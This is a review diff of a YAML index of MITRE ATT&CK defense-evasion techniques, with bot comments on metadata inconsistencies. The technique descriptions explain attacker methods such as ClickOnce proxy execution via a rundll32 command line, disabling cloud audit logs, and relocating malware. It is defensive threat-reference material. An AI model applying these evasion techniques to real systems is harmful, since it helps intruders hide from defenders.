+ url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+ - source_name: ATTACK IQ
+ description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+ (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+ Binaries. Retrieved July 15, 2024.'
+ url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+ - source_name: TrendMicro WindowsAppMac
+ description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+ Info Stealer and Adware. Retrieved April 25, 2019.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1027.004
atomic_tests:
- name: C compile
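Review bot: `x_mitre_permissions_required:` / `- User` is removed from T1027.004 in this hunk while T1134.005 and T1218.009 earlier in the diff keep the field, so within one file it is now present for some techniques and absent for others; consumers should treat it as optional, and if the generator only copies it when upstream still populates it, a sentence in the PR description would make that explicit.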
@@ -14500,7 +14638,7 @@ defense-evasion:
url: https://github.com/decalage2/oletools
description: decalage2. (2019, December 3). python-oletools. Retrieved September
18, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T14:02:07.944Z'
name: VBA Stomping
description: |-
Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -14526,12 +14664,10 @@ defense-evasion:
x_mitre_system_requirements:
- MS Office version specified in _VBA_PROJECT
stream must match
host
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -14621,7 +14757,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1127.001:
@@ -14679,12 +14814,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127.001
atomic_tests: []
T1656:
technique:
- modified: '2023-09-30T19:45:05.886Z'
+ modified: '2024-10-15T15:59:06.382Z'
name: Impersonation
description: "Adversaries may impersonate a trusted person or organization in
order to persuade and trick a target into performing some action on their
@@ -14726,10 +14860,9 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -14753,18 +14886,30 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.005:
technique:
- modified: '2023-10-02T22:17:54.968Z'
+ modified: '2024-09-25T14:15:26.322Z'
name: Modify Cloud Compute Configurations
- description: |-
- Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
- For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
- Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+ description: "Adversaries may modify settings that directly affect the size,
+ locations, and resources available to cloud compute infrastructure in order
+ to evade defenses. These settings may include service quotas, subscription
+ associations, tenant-wide policies, or other configurations that impact available
+ compute. Such modifications may allow adversaries to abuse the victim’s compute
+ resources to achieve their goals, potentially without affecting the execution
+ of running instances and/or revealing their activities to the victim.\n\nFor
+ example, cloud providers often limit customer usage of compute resources via
+ quotas. Customers may request adjustments to these quotas to support increased
+ computing needs, though these adjustments may require approval from the cloud
+ provider. Adversaries who compromise a cloud environment may similarly request
+ quota adjustments in order to support their activities, such as enabling additional
+ [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+ suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+ 2023) Adversaries may also increase allowed resource usage by modifying any
+ tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+ Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+ where cloud resources can be deployed, such as enabling [Unused/Unsupported
+ Cloud Regions](https://attack.mitre.org/techniques/T1535). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
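Review bot: the T1578.005 description loses its third paragraph entirely: the example of a Global Administrator creating new subscriptions or transferring a pay-as-you-go subscription to an adversary-controlled tenant (subscription hijacking) is gone, and the new text ends with a trailing space after `Cloud Regions](https://attack.mitre.org/techniques/T1535). `. Together with the version bump to 2.0 and the removal of the `Microsoft Subscription Hijacking 2022` and `Microsoft Peach Sandstorm 2023` references in the hunks below, this narrows what T1578.005 covers, so any local mapping or detection that filed Azure subscription transfer under this technique needs re-homing; the diff does not say where upstream moved it. The scalar style also changes from the `|-` block to a double-quoted string with `\n\n`, which is YAML-equivalent but makes the description diff unreadable; preferring block scalars in the emitter would help.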
@@ -14778,7 +14923,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
type: attack-pattern
@@ -14790,20 +14935,11 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1578/005
external_id: T1578.005
- - source_name: Microsoft Subscription Hijacking 2022
- description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
- using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
- url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
- source_name: Microsoft Cryptojacking 2023
description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
Understanding and defending against cloud compute resource abuse. Retrieved
September 5, 2023.'
url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
- - source_name: Microsoft Peach Sandstorm 2023
- description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
- password spray campaigns enable intelligence collection at high-value targets.
- Retrieved September 18, 2023.
- url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
- source_name: Microsoft Azure Policy
description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
Retrieved September 5, 2023.
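Review bot: two references are removed from T1578.005 here (`Microsoft Subscription Hijacking 2022` and `Microsoft Peach Sandstorm 2023`), but only the tail of the rewritten description is visible in this diff, and it cites just `Microsoft Cryptojacking 2023` and `Microsoft Azure Policy`; please confirm the earlier part of the description no longer contains `(Citation: Microsoft Subscription Hijacking 2022)` or `(Citation: Microsoft Peach Sandstorm 2023)`, otherwise those citation markers will dangle with no matching `source_name`.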
@@ -14812,11 +14948,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.008:
technique:
- modified: '2024-04-12T21:13:56.431Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Impair Defenses: Disable Cloud Logs'
description: |-
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
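Review bot: `spec_version: '2.1'` is dropped from T1578.005 here and from every other technique object touched in this diff with no replacement; if anything downstream of this index reads the STIX `spec_version` field, the removal should be called out in the commit message rather than left implicit in a reorder. The `modified` bump for T1562.008 matches the contributor and platform changes in the hunks that follow.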
@@ -14825,6 +14960,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -14834,6 +14970,7 @@ defense-evasion:
- Janantha Marasinghe
- Matt Snyder, VMware
- Joe Gumke, U.S. Bank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
for: StopLogging
and DeleteTrail
.(Citation: Stopping
@@ -14845,13 +14982,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- - Office 365
- x_mitre_version: '2.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'User Account: User Account Modification'
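Review bot: the T1562.008 platform list replaces `Google Workspace`, `Azure AD` and `Office 365` with `Office Suite` and `Identity Provider` while the version only moves from 2.0 to 2.1; since these strings are used as platform identifiers, anything keyed on the old names (per-platform index files, platform filters in test selection) must be regenerated in the same change, or filtering by the old values will silently return no tests.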
@@ -14896,9 +15033,6 @@ defense-evasion:
url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.008
atomic_tests:
- name: AWS - Disable CloudTrail Logging Through Event Selectors using Stratus
@@ -15173,18 +15307,140 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.003
atomic_tests: []
+ T1127.002:
+ technique:
+ modified: '2024-10-17T18:50:41.474Z'
+ name: ClickOnce
+ description: |-
+ Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+ Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+ ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+ Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+ Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Wirapong Petshagun
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Metadata'
+ - 'Module: Module Load'
+ x_mitre_system_requirements:
+ - ".NET Framework"
+ type: attack-pattern
+ id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+ created: '2024-09-09T14:39:28.637Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1127/002
+ external_id: T1127.002
+ - source_name: LOLBAS /Dfsvc.exe
+ description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+ - source_name: Microsoft Learn ClickOnce
+ description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+ Retrieved September 9, 2024.
+ url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+ - source_name: SpectorOps Medium ClickOnce
+ description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+ (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+ url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+ - source_name: NetSPI ClickOnce
+ description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+ Love Story. Retrieved September 9, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+ - source_name: Burke/CISA ClickOnce Paper
+ description: William J. Burke IV. (n.d.). Appref-ms Abuse for Code Execution
+ & C2. Retrieved September 9, 2024.
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+ - source_name: Burke/CISA ClickOnce BlackHat
+ description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+ IN: When .appref-ms abuse is operating as intended. Retrieved September
+ 9, 2024.'
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1070.010:
+ technique:
+ modified: '2024-10-13T15:48:46.391Z'
+ name: Relocate Malware
+ description: |-
+ Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+ Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+ Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Matt Anderson, @nosecurething, Huntress
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+ created: '2024-05-31T11:07:57.406Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/010
+ external_id: T1070.010
+ - source_name: Latrodectus APR 2024
+ description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+ (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+ 31, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+ - source_name: DFIR Report Trickbot June 2023
+ description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+ Retrieved May 31, 2024.
+ url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
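Review bot: the two Burke/CISA reference URLs for the new T1127.002 entry carry Google Analytics tracking state (`?_gl=1*...&_ga=...`); strip the query string so they point at the bare PDFs on i.blackhat.com, as no other reference in this diff carries tracking parameters. The same author is also recorded as `William J. Burke IV` in `Burke/CISA ClickOnce Paper` and `William Joseph Burke III` in `Burke/CISA ClickOnce BlackHat`; these come from upstream ATT&CK data, but the two should be reconciled or reported upstream. The `x_mitre_detection: ''` on both new techniques (T1127.002, T1070.010) and their `atomic_tests: []` are expected for freshly imported techniques with no tests yet.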
@@ -15217,10 +15473,9 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
@@ -15257,40 +15512,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.002:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
- type: attack-pattern
- created: '2020-05-14T14:45:15.978Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.002
- url: https://attack.mitre.org/techniques/T1578/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.416Z'
name: Create Cloud Instance
description: |-
An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -15299,20 +15524,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the RunInstances
event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create
to create a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Creation'
- 'Instance: Instance Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+ created: '2020-05-14T14:45:15.978Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/002
+ external_id: T1578.002
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.009:
technique:
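Review bot: the `Mandiant M-Trends 2020` URL changes from `https://content.fireeye.com/m-trends/rpt-m-trends-2020` to `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf`, and `x_mitre_permissions_required: [User]` is dropped, inside what is otherwise a key-reordering hunk for T1578.002; both are real content changes and should be named in the commit message rather than buried in the reorder. The unbalanced line breaks around `RunInstances` and `gcloud compute instances create` in `x_mitre_detection` predate this change and look like residue of stripped markup; not a blocker, but a candidate for follow-up cleanup.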
@@ -15342,7 +15597,7 @@ defense-evasion:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
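Review bot: the `modified` timestamp for T1055.009 moves backwards, from `2021-04-29T14:49:39.188Z` to `2020-06-20T22:25:55.331Z`; the same regression appears below for T1601.001 (`2021-04-29` to `2020-10-22`) and T1070.009 (`2023-05-09` to `2023-04-11`). If the new values are what the current upstream STIX bundle reports this is fine, but it should be confirmed, since a decreasing `modified` usually means the generator was run against an older snapshot.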
@@ -15385,8 +15640,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1601.001:
technique:
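Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed from T1055.009 here with no replacement added in this hunk, whereas the other objects in this diff carry `x_mitre_attack_spec_version: 3.2.0` after `object_marking_refs`; confirm the field is re-added elsewhere in this object (the same applies to T1601.001 in the hunk below), or these two techniques will be the only ones in the index without an attack spec version.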
@@ -15433,7 +15686,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:46.560Z'
name: Patch System Image
description: "Adversaries may modify the operating system of a network device
to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -15499,12 +15752,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T22:30:01.227Z'
name: Clear Persistence
description: |-
Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -15559,33 +15810,84 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
- T1556.001:
- technique:
- x_mitre_platforms:
- - Windows
+ T1036.010:
+ technique:
+ modified: '2024-10-17T15:20:36.705Z'
+ name: Masquerade Account Name
+ description: "Adversaries may match or approximate the names of legitimate accounts
+ to make newly created ones appear benign. This will typically occur during
+ [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+ may also be renamed at a later date. This may also coincide with [Account
